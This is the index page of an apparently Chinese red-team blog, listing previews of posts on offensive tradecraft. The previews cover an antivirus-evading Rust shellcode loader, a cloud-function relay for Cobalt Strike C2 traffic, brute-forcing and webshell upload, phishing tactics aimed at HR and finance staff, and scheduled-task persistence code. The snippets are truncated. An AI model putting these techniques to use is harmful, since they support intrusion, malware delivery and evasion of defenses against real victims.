<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>Hyyrent blog</title><meta name="author" content="Hyyrent"><meta name="copyright" content="Hyyrent"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta property="og:type" content="website">
<meta property="og:title" content="Hyyrent blog">
<meta property="og:url" content="https://pizz33.github.io/index.html">
<meta property="og:site_name" content="Hyyrent blog">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pizz33.github.io/img/touxiang.png">
<meta property="article:author" content="Hyyrent">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pizz33.github.io/img/touxiang.png"><link rel="shortcut icon" href="/img/ico.jpg"><link rel="canonical" href="https://pizz33.github.io/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
root: '/',
algolia: undefined,
localSearch: undefined,
translate: {"defaultEncoding":1,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
noticeOutdate: undefined,
highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
copy: {
success: '复制成功',
error: '复制错误',
noSupport: '浏览器不支持'
},
relativeDate: {
homepage: false,
post: false
},
runtime: '天',
date_suffix: {
just: '刚刚',
min: '分钟前',
hour: '小时前',
day: '天前',
month: '个月前'
},
copyright: undefined,
lightbox: 'fancybox',
Snackbar: undefined,
source: {
justifiedGallery: {
js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
}
},
isPhotoFigcaption: false,
islazyload: false,
isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
title: 'Hyyrent blog',
isPost: false,
isHome: true,
isHighlightShrink: false,
isToc: false,
postUpdate: '2024-06-04 11:41:51'
}</script><noscript><style type="text/css">
#nav {
opacity: 1
}
.justified-gallery img {
opacity: 1
}
#recent-posts time,
#post-meta time {
display: inline !important
}
</style></noscript><script>(win=>{
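win.saveToLocal = {
  /**
   * Store `value` under `key` in localStorage with a lifetime in days.
   * A ttl of 0 is a no-op (nothing is written). A missing ttl produces a
   * NaN expiry, which `get` never treats as expired.
   * @param {string} key
   * @param {*} value - any JSON-serialisable value
   * @param {number} ttl - lifetime in days
   */
  set: function setWithExpiry(key, value, ttl) {
    if (ttl === 0) return
    const expiryMs = ttl * 86400000
    const item = {
      value: value,
      expiry: Date.now() + expiryMs,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },
  /**
   * Read a value written by `set`.
   * Returns undefined when the key is absent, expired, or does not hold a
   * well-formed record. Unparsable or non-object entries are removed instead
   * of thrown on, so one corrupted key cannot abort the inline theme setup
   * that runs before the page renders.
   * @param {string} key
   * @returns {*} the stored value, or undefined
   */
  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)
    if (!itemStr) return undefined
    let item
    try {
      item = JSON.parse(itemStr)
    } catch (err) {
      // Not written by `set` (or corrupted): discard so the next read is clean.
      localStorage.removeItem(key)
      return undefined
    }
    if (item === null || typeof item !== 'object') {
      // JSON.parse of e.g. "null" or "5" succeeds but is not a record.
      localStorage.removeItem(key)
      return undefined
    }
    if (Date.now() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}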
// Inject an external script tag and resolve once it has executed.
// The readyState branch covers old IE, which fires onreadystatechange rather
// than onload; both handlers are cleared once the load has been observed.
// NOTE(review): only `src` and `async` are set — no `integrity` attribute —
// so whatever URL is passed runs with full page privileges. Callers in this
// file pass fixed CDN constants; keep it that way.
win.getScript = url => new Promise((resolve, reject) => {
  const tag = document.createElement('script')
  tag.src = url
  tag.async = true
  tag.onerror = reject
  const onLoaded = function () {
    const state = this.readyState
    const stillLoading = state && state !== 'loaded' && state !== 'complete'
    if (stillLoading) return
    tag.onload = tag.onreadystatechange = null
    resolve()
  }
  tag.onload = tag.onreadystatechange = onLoaded
  document.head.appendChild(tag)
})
// Switch the document to the dark theme and, when present, update the
// browser-chrome colour declared by <meta name="theme-color"> to match.
win.activateDarkMode = function () {
  const root = document.documentElement
  root.setAttribute('data-theme', 'dark')
  const themeMeta = document.querySelector('meta[name="theme-color"]')
  if (themeMeta !== null) themeMeta.setAttribute('content', '#0d0d0d')
}
// Switch the document to the light theme and, when present, update the
// browser-chrome colour declared by <meta name="theme-color"> to match.
win.activateLightMode = function () {
  const root = document.documentElement
  root.setAttribute('data-theme', 'light')
  const themeMeta = document.querySelector('meta[name="theme-color"]')
  if (themeMeta !== null) themeMeta.setAttribute('content', '#ffffff')
}
// Apply the persisted theme; with no stored preference, fall back to the
// local clock (18:00–06:59 counts as night). Any stored value other than
// 'light' selects the dark theme.
const storedTheme = saveToLocal.get('theme')
const currentHour = new Date().getHours()
const preferDark = currentHour <= 6 || currentHour >= 18
if (storedTheme === undefined) {
  preferDark ? activateDarkMode() : activateLightMode()
} else if (storedTheme === 'light') {
  activateLightMode()
} else {
  activateDarkMode()
}
// Restore the single/double-column layout choice, if one was saved.
const storedAside = saveToLocal.get('aside-status')
if (storedAside !== undefined) {
  const rootClasses = document.documentElement.classList
  storedAside === 'hide' ? rootClasses.add('hide-aside') : rootClasses.remove('hide-aside')
}
// Tag Apple platforms so CSS can apply platform-specific tweaks.
const markApple = () => {
  const ua = navigator.userAgent
  if (/iPad|iPhone|iPod|Macintosh/.test(ua)) document.documentElement.classList.add('apple')
}
markApple()
})(window)</script><meta name="generator" content="Hexo 6.1.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/touxiang.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">60</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">19</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 文章</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="page" id="body-wrap"><header class="full_page" id="page-header" style="background-image: url('/img/bg.jpg')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Hyyrent blog</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 文章</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i 
class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="site-info"><h1 id="site-title">Hyyrent blog</h1><div id="site-subtitle"><span id="subtitle"></span></div><div id="site_social_icons"><a class="social-icon" href="https://github.com/Pizz33/" target="_blank" title="Github"><i class="fab fa-github"></i></a></div></div><div id="scroll-down"><i class="fas fa-angle-down scroll-down-effects"></i></div></header><main class="layout" id="content-inner"><div class="recent-posts" id="recent-posts"><div class="recent-post-item"><div class="post_cover left"><a href="/posts/4e137f0df999/" title="工具开发-Rustloader免杀生成器"><img class="post_bg" src="/img/10.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="工具开发-Rustloader免杀生成器"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/4e137f0df999/" title="工具开发-Rustloader免杀生成器">工具开发-Rustloader免杀生成器</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2024-06-04T03:12:09.000Z" title="发表于 2024-06-04 11:12:09">2024-06-04</time></span></div><div class="content">Rustloader免杀生成器开发背景由于近年来go用来做免杀器越来越普遍,导致杀软对go编译程序静态查杀力度增大,因此转型投入rust的怀抱
说实话,rust的语法是真难懂,边改边查参考github代码总算是捏出来了
加载方式
使用LoadLibraryA和GetProcAddress从ntdll获取NtQueueApcThreadEx函数。
使用VirtualAlloc分配远程内存。
使用STD::PTR::COPY将SHELLCODE复制到分配的内存。
使用VirtualProtect将内存权限更改为可执行文件。
使用GetCurrentThread获取当前线程句柄。
使用NtQueueApcThreadEx执行SHELLCODE
使用方式和我之前开发的go千机一样,一样是一键化生成,别问,问就是为了最大化的简便,目录结构如下
解压打开文件目录,把 beacon_x64.bin 放置在当前目录下,点击 一键生成.bat
输出免杀文件在 output 文件夹下,随机六位数命名
捆绑文件选择捆绑文件存放在 bundle 文件夹下,默认放置打开损坏文档
如果不需要捆绑文件,把ma ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/89e60a4b8738/" title="溯源反制-简易蜜罐设计流程"><img class="post_bg" src="/img/13.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="溯源反制-简易蜜罐设计流程"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/89e60a4b8738/" title="溯源反制-简易蜜罐设计流程">溯源反制-简易蜜罐设计流程</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2024-05-17T03:36:13.000Z" title="发表于 2024-05-17 11:36:13">2024-05-17</time></span></div><div class="content">简易蜜罐设计流程设计要点部署方式尽量简便,适配环境兼容性高,与客户实际网络环境单独隔离,防止作为跳板进行横向
水坑攻击
部署仿真系统供攻击者进行攻击
仿真系统需提供接口供攻击队扫描识别漏洞
通过js水坑触发安全控件弹窗诱使攻击者安装
不安装则会重定向到首页
代码实现
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152from flask import Flask, send_from_directory, request, make_responseapp = Flask(__name__, static_folder='static')@app.route('/')def index(): return send_from_directory(app.static_folder, '1.html')@app.route('/test.exe')d ...</div></div></div><div class="recent-post-item"><div class="post_cover left"><a href="/posts/4cd847860269/" title="工具开发-go实现屏幕监控截图"><img class="post_bg" src="/img/13.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="工具开发-go实现屏幕监控截图"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/4cd847860269/" title="工具开发-go实现屏幕监控截图">工具开发-go实现屏幕监控截图</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2024-05-16T09:44:58.000Z" title="发表于 2024-05-16 17:44:58">2024-05-16</time></span></div><div class="content">开发背景今天好兄弟打项目时候碰到这么一个情况,目标机器访问内网应用需要连接VPN,会切断外网连接,导致beacon无法及时执行回显命令
为了证明能够突破隔离,需要目标机器访问内网应用的截图,于是简单写了下,当作记录
代码实现go build -trimpath -ldflags="-s -w -H windowsgui" main.go
为了避免后续beacon掉线导致进程一直执行,需要设置生成次数限制
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455package mainimport ( "fmt" "image/png" "os" "path/filepath" "time" "github.com/vova616/screenshot")func main() { //路径 s ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/5c2ada4745d3/" title="钓鱼技巧-FTP高级LNK钓鱼技术"><img class="post_bg" src="/img/4.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="钓鱼技巧-FTP高级LNK钓鱼技术"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/5c2ada4745d3/" title="钓鱼技巧-FTP高级LNK钓鱼技术">钓鱼技巧-FTP高级LNK钓鱼技术</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2024-05-10T10:11:03.000Z" title="发表于 2024-05-10 18:11:03">2024-05-10</time></span></div><div class="content">
573c9136887dd3c10ac91ab197c13a96b784871495672aa585ffee31d6f40e013c53864c5823bcd71b7854b059b5710564c158aae16c011554207d7400c1120040828bd4c48457f924171f28f3e9badf31c0c9ec90f9e80610ee88e16dd4a50a235b1f1fa0378a3f639256df0d07d9c3438c3ae28f23791756489eedeb39a576173acce25893cdd702b732c21c49943146e0154069e7a260bf6d023d59a17b77c35c7deb4a4885c78c03c1772544628bd5cecdd48a467465a2257796587dd4b768fcad3c03db07e03a11a960b5085f9a56a580dd066e010098e998ea909c1206bb942303f670dbc4a64986e04981b34dfd13c77ba30bc7565 ...</div></div></div><div class="recent-post-item"><div class="post_cover left"><a href="/posts/8201ba3f7483/" title="红队技术-攻防场景下360对抗专题"><img class="post_bg" src="/img/2.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-攻防场景下360对抗专题"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/8201ba3f7483/" title="红队技术-攻防场景下360对抗专题">红队技术-攻防场景下360对抗专题</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2024-03-27T07:57:34.000Z" title="发表于 2024-03-27 15:57:34">2024-03-27</time></span></div><div class="content">
cbd6f2c07a534cf88d3655f88e3f0065671c1e8f29ae7ff190de02afd711ca5cae147bb433f7779110a70e5dd31a1ce0ce9d5784827302c1ce9237a967ff9cff52acfaf9c668748a1f517ca01f1afd72814d958d3884685eea4696ea53d977c3c60f4bc1f6d5e1390b284a12d8a4cd503969c3f2522611afe3b2786375097ccf08f356c3af922b2e1c77b2b58bc1fc76af3a9c7a799d66b0e564017ba6def25ebc166ec322812262cf2a58b7c694b4157ba8487241b9363d19c025b32c957011f5aa0ce7f64d97cb64df4a9584cd9341af7234832e9ebdea8d6c194e74ecd3a5065bf871453387784377923f00ee08f6855af17a9f7896318 ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/e251af601155/" title="红队技术-cobaltstrike流量隐藏"><img class="post_bg" src="/img/15.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-cobaltstrike流量隐藏"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/e251af601155/" title="红队技术-cobaltstrike流量隐藏">红队技术-cobaltstrike流量隐藏</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2024-01-19T07:23:38.000Z" title="发表于 2024-01-19 15:23:38">2024-01-19</time></span></div><div class="content">云函数新建一个云函数,在代码位置进行修改
首先导入 yisiwei.zip 的云函数包
12345678910111213141516171819# -*- coding: utf8 -*-import json, requests, base64def main_handler(event, context): C2 = 'https://49.xx.xx.xx' # 这里可以使用 HTTP、HTTPS~下角标~ path = event['path'] headers = event['headers'] print(event) if event['httpMethod'] == 'GET': resp = requests.get(C2 + path, headers=headers, verify=False) else: resp = requests.post(C2 + path, data=event[ ...</div></div></div><div class="recent-post-item"><div class="post_cover left"><a href="/posts/6362e2e0ec1e/" title="红队技术-外网打点实战案例分享"><img class="post_bg" src="/img/4.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-外网打点实战案例分享"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/6362e2e0ec1e/" title="红队技术-外网打点实战案例分享">红队技术-外网打点实战案例分享</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2023-12-15T08:56:08.000Z" title="发表于 2023-12-15 16:56:08">2023-12-15</time></span></div><div class="content">红队外网打点实战案例分享从最基础的登录框突破登录框作为hw出现场次最多的角色,也是最容易出洞的,下面介绍一些自己常用的测试方法
登录爆破小技巧
像这种系统的爆破我们有两种解决方法:
分析前端加密算法,写脚本模拟对密码进行加密
固定密码为123456 000000 使用常见的用户名作为字典进行爆破
两种方法各有优劣,我更倾向于第二种,在比赛打点效率会更高,分析加密算法更适用于红队检测项目
使用爆破的账号密码登入后台,便可以继续寻找后台上传点
看到图片类型这里限制上传的文件格式
直接添加 aspx 文件格式类型
成功getshell
修改返回数据包参数进入后台有些时候网站登录状态是根据前端判断的,这时候我们就可以直接修改返回包进行绕过
前端判断登录逻辑根据返回包的ret值决定,当返回值为1则成功登录
成功进入后台
插件探测常见sql注入和log4j漏洞sql注入插件推荐 https://github.com/smxiazi/xia_sql
基本原理是通过发送多个数据包,根据返回数据长度判断是否存在注入
除了被动扫描以外,我们还可以通过手动添加单引号、双引号去查看返回包 ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/53de6033c423/" title="红队技术-钓鱼手法及木马免杀技巧"><img class="post_bg" src="/img/13.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-钓鱼手法及木马免杀技巧"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/53de6033c423/" title="红队技术-钓鱼手法及木马免杀技巧">红队技术-钓鱼手法及木马免杀技巧</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2023-11-15T03:51:54.000Z" title="发表于 2023-11-15 11:51:54">2023-11-15</time></span></div><div class="content">简述钓鱼是攻防对抗中一种常用的手段,攻击者通常伪装成可信任的实体,例如合法的机构、公司或个人,以引诱受害者揭示敏感信息或执行恶意操作,能快速地撕破目标的伤口进行深入利用,快速进内网进行刷分,投递木马同时需要考虑逃避杀毒软件检测,本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开
信息搜集大批量邮箱搜集大批量邮箱搜集可通过
https://app.snov.io/
http://www.skymem.info/
搜索引擎但一般来说,企业邮箱都存在邮服网关,邮件很难投递,所以我们要选择私人邮箱或不被邮服拦截的邮箱
比如说 xx举报,xx招聘面对大众的邮箱,相关语法:
12345site:"xxx.com" 举报site:"xxx.com" 招聘xx公司举报 @126.comxx公司招聘 @qq.com
钓鱼手法社工钓鱼1、首先是目标选择,目标群体:hr、经理、财务 等安全意识薄弱的人优先选择,避开信息安全部
2、选择目标公司分部进行钓鱼成功率较高,前期提前想好话术和应变对策,避免被识破
2、社牛的师傅可以尝试电话钓鱼,获取信任再添加微信发送木 ...</div></div></div><div class="recent-post-item"><div class="post_cover left"><a href="/posts/47466d44bcd2/" title="红队技术-上线木马自动维权"><img class="post_bg" src="/img/1.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-上线木马自动维权"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/47466d44bcd2/" title="红队技术-上线木马自动维权">红队技术-上线木马自动维权</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2023-10-30T11:32:25.000Z" title="发表于 2023-10-30 19:32:25">2023-10-30</time></span></div><div class="content">在攻防中,上线机器总是需要手动进行维权,太过于麻烦,何不直接上线即维权呢,直接放核心代码,当做个记录
https://github.com/capnspacehook/taskmaster
12345678910111213141516171819202122232425262728293031323334353637383940package mainimport ( "os" "github.com/capnspacehook/taskmaster")func runWinTask(path string) { // 创建初始化计划任务 taskService, _ := taskmaster.Connect() defer taskService.Disconnect() // 定义新的计划任务 newTaskDef := taskService.NewTaskDefinition() // 添加执行程序的路径 newTaskDef.AddAction(taskmaster.ExecAction{ Path: path ...</div></div></div><div class="recent-post-item"><div class="post_cover right"><a href="/posts/20dde3b26f4a/" title="红队技术-社工钓鱼细节技巧"><img class="post_bg" src="/img/5.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-社工钓鱼细节技巧"></a></div><div class="recent-post-info"><a class="article-title" href="/posts/20dde3b26f4a/" title="红队技术-社工钓鱼细节技巧">红队技术-社工钓鱼细节技巧</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2023-09-26T07:40:04.000Z" title="发表于 2023-09-26 15:40:04">2023-09-26</time></span></div><div class="content">社工钓鱼细节技巧钓鱼对象1、hr、经理、财务 等安全意识薄弱的人,避开信息安全部
如何搜集邮箱信息?
https://app.snov.io/
但一般来说,企业邮箱都存在邮服网关,邮件很难投递,所以我们要选择一些针对公开群众的邮箱
比如说 xxx举报,xxx信息反馈面对大众的邮箱,如何搜集呢
钓鱼手法1、群发(不推荐,易被发现或被邮服拦截)
2、添加微信发送钓鱼木马(话术获取信任)
3、扫码活动钓账号
邮件投递木马1、木马需要打压缩,添加密码并隐藏内容,防止直接在压缩包内打开
2、后缀可选择其他非exe仍可执行的,如scr、com等
3、如果知道对方杀软没有360这种,可通过空格和长文件命名
免杀及捆绑文件自写工具介绍
杀软特性
杀软类型
免杀绕过技巧
火绒
编译参数限制多,对hash和字符串特征进行识别,静态能过动态基本不查杀,对很多go库调用报毒
360
单360查杀力不高,装了杀毒后直接儿子变爸爸,查杀力大大提升,对于简单的加密识别度较高,容易上线后云查杀过一会掉线,推荐使用分离加载方式,并使用反沙箱的代码延长马子时间,对资源查杀力度强,会报qvm
3 ...</div></div></div><nav id="pagination"><div class="pagination"><span class="page-number current">1</span><a class="page-number" href="/page/2/#content-inner">2</a><span class="space">…</span><a class="page-number" href="/page/6/#content-inner">6</a><a class="extend next" rel="next" href="/page/2/#content-inner"><i class="fas fa-chevron-right fa-fw"></i></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/touxiang.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">Hyyrent</div><div class="author-info__description"></div></div><div class="card-info-data is-center"><div class="card-info-data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">60</div></a></div><div class="card-info-data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">19</div></a></div><div class="card-info-data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div></div><a id="card-info-btn" href="https://pizz33.github.io/"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/Pizz33/" target="_blank" title="Github"><i class="fab fa-github"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/posts/4e137f0df999/" title="工具开发-Rustloader免杀生成器"><img src="/img/10.png" onerror="this.onerror=null;this.src='/img/404.jpg'" 
alt="工具开发-Rustloader免杀生成器"/></a><div class="content"><a class="title" href="/posts/4e137f0df999/" title="工具开发-Rustloader免杀生成器">工具开发-Rustloader免杀生成器</a><time datetime="2024-06-04T03:12:09.000Z" title="发表于 2024-06-04 11:12:09">2024-06-04</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/89e60a4b8738/" title="溯源反制-简易蜜罐设计流程"><img src="/img/13.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="溯源反制-简易蜜罐设计流程"/></a><div class="content"><a class="title" href="/posts/89e60a4b8738/" title="溯源反制-简易蜜罐设计流程">溯源反制-简易蜜罐设计流程</a><time datetime="2024-05-17T03:36:13.000Z" title="发表于 2024-05-17 11:36:13">2024-05-17</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/4cd847860269/" title="工具开发-go实现屏幕监控截图"><img src="/img/13.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="工具开发-go实现屏幕监控截图"/></a><div class="content"><a class="title" href="/posts/4cd847860269/" title="工具开发-go实现屏幕监控截图">工具开发-go实现屏幕监控截图</a><time datetime="2024-05-16T09:44:58.000Z" title="发表于 2024-05-16 17:44:58">2024-05-16</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/5c2ada4745d3/" title="钓鱼技巧-FTP高级LNK钓鱼技术"><img src="/img/4.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="钓鱼技巧-FTP高级LNK钓鱼技术"/></a><div class="content"><a class="title" href="/posts/5c2ada4745d3/" title="钓鱼技巧-FTP高级LNK钓鱼技术">钓鱼技巧-FTP高级LNK钓鱼技术</a><time datetime="2024-05-10T10:11:03.000Z" title="发表于 2024-05-10 18:11:03">2024-05-10</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/8201ba3f7483/" title="红队技术-攻防场景下360对抗专题"><img src="/img/2.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红队技术-攻防场景下360对抗专题"/></a><div class="content"><a class="title" href="/posts/8201ba3f7483/" title="红队技术-攻防场景下360对抗专题">红队技术-攻防场景下360对抗专题</a><time datetime="2024-03-27T07:57:34.000Z" title="发表于 2024-03-27 15:57:34">2024-03-27</time></div></div></div></div><div class="card-widget card-tags"><div 
class="item-headline"><i class="fas fa-tags"></i><span>标签</span></div><div class="card-tag-cloud"><a href="/tags/Java%E5%AD%A6%E4%B9%A0/" style="font-size: 1.17em; color: #999c9f">Java学习</a> <a href="/tags/%E4%BA%91%E5%AE%89%E5%85%A8/" style="font-size: 1.1em; color: #999">云安全</a> <a href="/tags/%E5%85%8D%E6%9D%80%E6%8A%80%E6%9C%AF/" style="font-size: 1.23em; color: #999ea6">免杀技术</a> <a href="/tags/%E5%B7%A5%E5%85%B7%E5%BC%80%E5%8F%91/" style="font-size: 1.3em; color: #99a1ac">工具开发</a> <a href="/tags/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" style="font-size: 1.17em; color: #999c9f">应急响应</a> <a href="/tags/%E6%8A%80%E6%9C%AF%E7%A0%94%E7%A9%B6/" style="font-size: 1.1em; color: #999">技术研究</a> <a href="/tags/%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83/" style="font-size: 1.23em; color: #999ea6">攻防演练</a> <a href="/tags/%E6%97%A5%E5%B8%B8%E6%8A%80%E5%B7%A7/" style="font-size: 1.23em; color: #999ea6">日常技巧</a> <a href="/tags/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" style="font-size: 1.17em; color: #999c9f">权限维持</a> <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" style="font-size: 1.37em; color: #99a4b2">渗透测试</a> <a href="/tags/%E6%BA%AF%E6%BA%90%E5%8F%8D%E5%88%B6/" style="font-size: 1.17em; color: #999c9f">溯源反制</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/" style="font-size: 1.1em; color: #999">漏洞利用</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" style="font-size: 1.43em; color: #99a6b9">漏洞复现</a> <a href="/tags/%E7%97%95%E8%BF%B9%E6%B8%85%E9%99%A4/" style="font-size: 1.1em; color: #999">痕迹清除</a> <a href="/tags/%E7%A7%BB%E5%8A%A8%E5%AE%89%E5%85%A8/" style="font-size: 1.1em; color: #999">移动安全</a> <a href="/tags/%E7%BA%A2%E9%98%9F%E6%8A%80%E6%9C%AF/" style="font-size: 1.5em; color: #99a9bf">红队技术</a> <a href="/tags/%E8%BD%AF%E4%BB%B6%E7%A0%B4%E8%A7%A3/" style="font-size: 1.1em; color: #999">软件破解</a> <a href="/tags/%E9%92%93%E9%B1%BC%E6%8A%80%E5%B7%A7/" style="font-size: 1.17em; color: #999c9f">钓鱼技巧</a> <a href="/tags/%E9%9D%B6%E5%9C%BA%E5%AD%A6%E4%B9%A0/" 
style="font-size: 1.23em; color: #999ea6">靶场学习</a></div></div><div class="card-widget card-archives"><div class="item-headline"><i class="fas fa-archive"></i><span>归档</span><a class="card-more-btn" href="/archives/" title="查看更多">
<i class="fas fa-angle-right"></i></a></div><ul class="card-archive-list"><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/06/"><span class="card-archive-list-date">六月 2024</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/05/"><span class="card-archive-list-date">五月 2024</span><span class="card-archive-list-count">3</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/03/"><span class="card-archive-list-date">三月 2024</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2024/01/"><span class="card-archive-list-date">一月 2024</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/12/"><span class="card-archive-list-date">十二月 2023</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/11/"><span class="card-archive-list-date">十一月 2023</span><span class="card-archive-list-count">1</span></a></li><li class="card-archive-list-item"><a class="card-archive-list-link" href="/archives/2023/10/"><span class="card-archive-list-date">十月 2023</span><span class="card-archive-list-count">1</span></a></li><li 